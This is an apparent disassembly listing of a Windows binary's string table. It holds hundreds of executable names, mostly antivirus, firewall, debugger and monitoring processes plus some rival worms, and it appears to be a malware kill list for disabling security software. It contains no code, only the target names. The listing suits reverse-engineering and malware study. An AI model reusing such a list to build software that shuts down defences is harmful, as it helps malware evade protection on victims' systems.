align 4
aOutpost_exe db 'OUTPOST.EXE',0 ; DATA XREF: .text:0042F300�o
; .text:0042F304�o
aOtfix_exe db 'OTFIX.EXE',0 ; DATA XREF: .text:0042F2FC�o
align 4
aOstronet_exe db 'OSTRONET.EXE',0 ; DATA XREF: .text:0042F2F8�o
align 4
aOptimize_exe db 'OPTIMIZE.EXE',0 ; DATA XREF: .text:0042F2F4�o
align 4
aOnsrvr_exe db 'ONSRVR.EXE',0 ; DATA XREF: .text:0042F2F0�o
align 4
aOllydbg_exe db 'OLLYDBG.EXE',0 ; DATA XREF: .text:0042F2EC�o
aNwtool16_exe db 'NWTOOL16.EXE',0 ; DATA XREF: .text:0042F2E8�o
align 4
aNwservice_exe db 'NWSERVICE.EXE',0 ; DATA XREF: .text:0042F2E4�o
align 4
aNwinst4_exe db 'NWINST4.EXE',0 ; DATA XREF: .text:0042F2E0�o
aNvsvc32_exe db 'NVSVC32.EXE',0 ; DATA XREF: .text:0042F2DC�o
aNvc95_exe db 'NVC95.EXE',0 ; DATA XREF: .text:0042F2D8�o
align 4
aNvarch16_exe db 'NVARCH16.EXE',0 ; DATA XREF: .text:0042F2D4�o
align 4
aNupgrade_exe db 'NUPGRADE.EXE',0 ; DATA XREF: .text:0042F2CC�o
; .text:0042F2D0�o
align 4
aNui_exe db 'NUI.EXE',0 ; DATA XREF: .text:0042F2C8�o
aNtxconfig_exe db 'NTXconfig.EXE',0 ; DATA XREF: .text:0042F2C4�o
align 10h
aNtvdm_exe db 'NTVDM.EXE',0 ; DATA XREF: .text:0042F2C0�o
align 4
aNtrtscan_exe db 'NTRTSCAN.EXE',0 ; DATA XREF: .text:0042F2BC�o
align 4
aNt_exe db 'NT.EXE',0 ; DATA XREF: .text:0042F2B8�o
align 4
aNsupdate_exe db 'NSUPDATE.EXE',0 ; DATA XREF: .text:0042F2B4�o
align 4
aNstask32_exe db 'NSTASK32.EXE',0 ; DATA XREF: .text:0042F2B0�o
align 4
aNssys32_exe db 'NSSYS32.EXE',0 ; DATA XREF: .text:0042F2AC�o
aNsched32_exe db 'NSCHED32.EXE',0 ; DATA XREF: .text:0042F2A8�o
align 10h
aNpssvc_exe db 'NPSSVC.EXE',0 ; DATA XREF: .text:0042F2A4�o
align 4
aNpscheck_exe db 'NPSCHECK.EXE',0 ; DATA XREF: .text:0042F2A0�o
align 4
aNprotect_exe db 'NPROTECT.EXE',0 ; DATA XREF: .text:0042F29C�o
align 4
aNpfmessenger_e db 'NPFMESSENGER.EXE',0 ; DATA XREF: .text:0042F298�o
align 10h
aNpf40_tw_98_nt db 'NPF40_TW_98_NT_ME_2K.EXE',0 ; DATA XREF: .text:0042F294�o
align 4
aNotstart_exe db 'NOTSTART.EXE',0 ; DATA XREF: .text:0042F290�o
align 4
aNorton_interne db 'NORTON_INTERNET_SECU_3.0_407.EXE',0 ; DATA XREF: .text:0042F28C�o
align 10h
aNormist_exe db 'NORMIST.EXE',0 ; DATA XREF: .text:0042F288�o
aNod32_exe db 'NOD32.EXE',0 ; DATA XREF: .text:0042F284�o
align 4
aNmain_exe db 'NMAIN.EXE',0 ; DATA XREF: .text:0042F280�o
align 4
aNisum_exe db 'NISUM.EXE',0 ; DATA XREF: .text:0042F27C�o
align 10h
aNisserv_exe db 'NISSERV.EXE',0 ; DATA XREF: .text:0042F278�o
aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: .text:0042F274�o
align 4
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: .text:0042F270�o
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: .text:0042F26C�o
align 10h
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: .text:0042F268�o
align 10h
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: .text:0042F264�o
align 4
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: .text:0042F260�o
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: .text:0042F25C�o
align 4
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: .text:0042F258�o
align 4
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: .text:0042F254�o
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: .text:0042F250�o
align 4
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: .text:0042F24C�o
align 10h
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: .text:0042F248�o
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: .text:0042F244�o
align 4
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: .text:0042F240�o
align 4
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: .text:0042F23C�o
align 10h
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: .text:0042F238�o
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: .text:0042F234�o
align 4
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: .text:0042F230�o
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: .text:0042F22C�o
align 10h
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: .text:0042F228�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: .text:0042F224�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: .text:0042F220�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: .text:0042F21C�o
align 10h
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: .text:0042F218�o
align 4
aNav_exe db 'NAV.EXE',0 ; DATA XREF: .text:0042F214�o
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: .text:0042F210�o
align 4
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: .text:0042F20C�o
align 10h
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: .text:0042F208�o
align 10h
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: .text:0042F204�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: .text:0042F200�o
align 4
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: .text:0042F1FC�o
align 4
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: .text:0042F1F8�o
align 4
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: .text:0042F1F4�o
align 4
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .text:0042F1F0�o
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: .text:0042F1EC�o
align 10h
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: .text:0042F1E8�o
align 10h
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: .text:0042F1E4�o
align 4
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: .text:0042F1E0�o
align 4
aMsconfig_exe_0 db 'MSCONFIG.EXE',0 ; DATA XREF: .text:0042F1DC�o
align 4
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: .text:0042F1D8�o
align 4
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: .text:0042F1D4�o
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: .text:0042F1D0�o
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .text:0042F1CC�o
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: .text:0042F1C8�o
align 4
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: .text:0042F1C4�o
align 10h
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: .text:0042F1C0�o
align 4
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: .text:0042F1BC�o
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: .text:0042F1B8�o
align 4
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: .text:0042F1B4�o
align 4
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: .text:0042F1B0�o
align 4
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: .text:0042F1AC�o
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: .text:0042F1A8�o
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: .text:0042F1A4�o
align 4
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: .text:0042F1A0�o
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: .text:0042F19C�o
align 10h
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: .text:0042F198�o
align 4
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: .text:0042F194�o
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: .text:0042F190�o
align 4
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: .text:0042F18C�o
align 4
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: .text:0042F188�o
align 4
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: .text:0042F184�o
align 4
aMd_exe db 'MD.EXE',0 ; DATA XREF: .text:0042F180�o
align 4
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: .text:0042F17C�o
align 4
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: .text:0042F178�o
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: .text:0042F170�o
; .text:0042F174�o
align 4
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: .text:0042F16C�o
align 4
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: .text:0042F168�o
align 4
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: .text:0042F164�o
align 4
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: .text:0042F160�o
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: .text:0042F15C�o
align 10h
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: .text:0042F158�o
align 4
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: .text:0042F154�o
align 4
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: .text:0042F150�o
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: .text:0042F14C�o
align 4
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: .text:0042F144�o
; .text:0042F148�o
align 10h
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: .text:0042F140�o
align 4
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: .text:0042F13C�o
align 4
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: .text:0042F138�o
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: .text:0042F134�o
align 4
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: .text:0042F130�o
align 4
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: .text:0042F12C�o
align 4
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: .text:0042F128�o
align 4
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: .text:0042F124�o
align 4
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: .text:0042F120�o
align 10h
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: .text:0042F11C�o
align 10h
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: .text:0042F118�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: .text:0042F114�o
align 4
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: .text:0042F110�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: .text:0042F10C�o
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .text:0042F108�o
align 4
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: .text:0042F104�o
align 10h
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: .text:0042F100�o
align 4
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: .text:0042F0FC�o
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: .text:0042F0F8�o
align 4
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: .text:0042F0F4�o
align 10h
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: .text:0042F0F0�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: .text:0042F0EC�o
align 10h
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: .text:0042F0E8�o
align 4
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: .text:0042F0E4�o
align 10h
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: .text:0042F0E0�o
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: .text:0042F0DC�o
align 4
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: .text:0042F0D8�o
align 4
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: .text:0042F0D4�o
align 10h
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .text:0042F0D0�o
align 4
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: .text:0042F0CC�o
align 4
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: .text:0042F0C8�o
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: .text:0042F0C4�o
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: .text:0042F0C0�o
align 4
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: .text:0042F0BC�o
align 4
aInit_exe db 'INIT.EXE',0 ; DATA XREF: .text:0042F0B8�o
align 4
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: .text:0042F0B4�o
align 10h
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: .text:0042F0B0�o
align 4
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: .text:0042F0AC�o
align 4
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: .text:0042F0A8�o
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: .text:0042F0A4�o
align 4
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: .text:0042F0A0�o
align 4
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: .text:0042F09C�o
align 4
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: .text:0042F098�o
align 10h
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: .text:0042F094�o
align 4
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: .text:0042F090�o
align 4
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: .text:0042F088�o
; .text:0042F08C�o
align 4
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: .text:0042F084�o
align 4
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: .text:0042F080�o
align 4
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: .text:0042F07C�o
align 4
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: .text:0042F078�o
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: .text:0042F074�o
align 10h
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: .text:0042F070�o
align 10h
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: .text:0042F06C�o
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: .text:0042F068�o
align 4
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: .text:0042F064�o
align 4
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: .text:0042F060�o
align 10h
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: .text:0042F05C�o
align 4
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: .text:0042F058�o
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: .text:0042F054�o
align 4
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: .text:0042F050�o
align 4
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: .text:0042F04C�o
align 4
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: .text:0042F048�o
align 10h
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: .text:0042F044�o
align 4
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: .text:0042F040�o
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: .text:0042F03C�o
align 10h
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: .text:0042F038�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: .text:0042F034�o
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: .text:0042F030�o
align 4
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: .text:0042F02C�o
align 10h
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: .text:0042F028�o
align 4
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: .text:0042F024�o
align 4
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: .text:0042F020�o
align 4
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: .text:0042F01C�o
align 10h
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: .text:0042F018�o
align 4
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: .text:0042F014�o
align 4
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: .text:0042F010�o
align 4
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: .text:0042F00C�o
align 4
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: .text:0042F008�o
align 4
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: .text:0042F004�o
align 4
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: .text:0042F000�o
align 4
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: .text:0042EFFC�o
align 10h
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: .text:0042EFF8�o
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: .text:0042EFF4�o
align 4
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: .text:0042EFF0�o
align 4
aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: .text:0042EFEC�o
align 4
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: .text:0042EFE8�o
align 10h
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: .text:0042EFE4�o
align 4
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: .text:0042EFE0�o
align 4
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: .text:0042EFDC�o
align 4
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: .text:0042EFD8�o
align 10h
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: .text:0042EFD4�o
align 4
aFast_exe db 'FAST.EXE',0 ; DATA XREF: .text:0042EFD0�o
align 4
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: .text:0042EFCC�o
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: .text:0042EFC8�o
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: .text:0042EFC4�o
align 10h
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: .text:0042EFC0�o
align 4
aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: .text:0042EFBC�o
align 4
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: .text:0042EFB8�o
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: .text:0042EFB4�o
align 4
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: .text:0042EFB0�o
align 4
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: .text:0042EFAC�o
align 4
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: .text:0042EFA8�o
align 4
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: .text:0042EFA4�o
align 4
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: .text:0042EFA0�o
align 4
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: .text:0042EF9C�o
align 4
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: .text:0042EF98�o
align 4
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: .text:0042EF94�o
align 4
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: .text:0042EF90�o
align 4
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: .text:0042EF8C�o
align 4
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: .text:0042EF88�o
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: .text:0042EF84�o
align 4
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: .text:0042EF80�o
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: .text:0042EF7C�o
align 4
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: .text:0042EF78�o
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: .text:0042EF74�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: .text:0042EF70�o
align 4
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: .text:0042EF6C�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .text:0042EF68�o
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: .text:0042EF64�o
align 4
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: .text:0042EF60�o
align 4
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: .text:0042EF5C�o
align 4
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: .text:0042EF58�o
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: .text:0042EF54�o
align 4
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: .text:0042EF50�o
align 4
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: .text:0042EF4C�o
align 4
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: .text:0042EF48�o
align 10h
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: .text:0042EF44�o
align 4
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: .text:0042EF40�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: .text:0042EF3C�o
align 4
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: .text:0042EF38�o
align 4
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: .text:0042EF34�o
align 4
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: .text:0042EF30�o
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: .text:0042EF28�o
align 4
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: .text:0042EF24�o
align 4
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: .text:0042EF20�o
aCv_exe db 'CV.EXE',0 ; DATA XREF: .text:0042EF1C�o
align 4
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: .text:0042EF18�o
align 4
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: .text:0042EF14�o
align 4
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: .text:0042EF10�o
align 4
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: .text:0042EF0C�o
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: .text:0042EF08�o
align 4
aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: .text:0042EF04�o
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: .text:0042EF00�o
align 10h
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: .text:0042EEFC�o
align 4
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: .text:0042EEF8�o
align 4
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: .text:0042EEF4�o
align 4
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: .text:0042EEF0�o
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: .text:0042EEEC�o
align 10h
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: .text:0042EEE8�o
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: .text:0042EEE4�o
align 4
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: .text:0042EEE0�o
; .text:0042EF2C�o
align 4
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: .text:0042EEDC�o
align 4
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: .text:0042EED8�o
align 4
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: .text:0042EED0�o
; .text:0042EED4�o
align 4
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: .text:0042EECC�o
align 4
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: .text:0042EEC8�o
align 10h
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: .text:0042EEC4�o
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: .text:0042EEC0�o
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: .text:0042EEBC�o
align 10h
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: .text:0042EEB8�o
align 10h
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: .text:0042EEB4�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: .text:0042EEB0�o
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: .text:0042EEAC�o
align 10h
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: .text:0042EEA8�o
align 4
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: .text:0042EEA4�o
align 4
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: .text:0042EEA0�o
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: .text:0042EE9C�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: .text:0042EE98�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: .text:0042EE94�o
align 4
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: .text:0042EE90�o
align 4
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: .text:0042EE8C�o
align 4
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: .text:0042EE88�o
align 4
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: .text:0042EE84�o
align 10h
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: .text:0042EE80�o
align 4
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: .text:0042EE7C�o
align 10h
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: .text:0042EE78�o
align 10h
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: .text:0042EE74�o
align 4
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: .text:0042EE70�o
align 4
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .text:0042EE6C�o
align 4
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: .text:0042EE68�o
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: .text:0042EE64�o
align 4
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: .text:0042EE60�o
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: .text:0042EE58�o
; .text:0042EE5C�o
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: .text:0042EE54�o
align 4
aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: .text:0042EE50�o
align 4
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: .text:0042EE4C�o
align 4
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: .text:0042EE44�o
; .text:0042EE48�o
align 4
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: .text:0042EE40�o
align 4
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: .text:0042EE3C�o
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: .text:0042EE38�o
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: .text:0042EE34�o
align 4
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: .text:0042EE30�o
align 4
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: .text:0042EE28�o
; .text:0042EE2C�o
align 4
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: .text:0042EE24�o
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: .text:0042EE20�o
align 10h
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: .text:0042EE1C�o
align 10h
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: .text:0042EE18�o
align 4
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: .text:0042EE14�o
align 4
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: .text:0042EE10�o
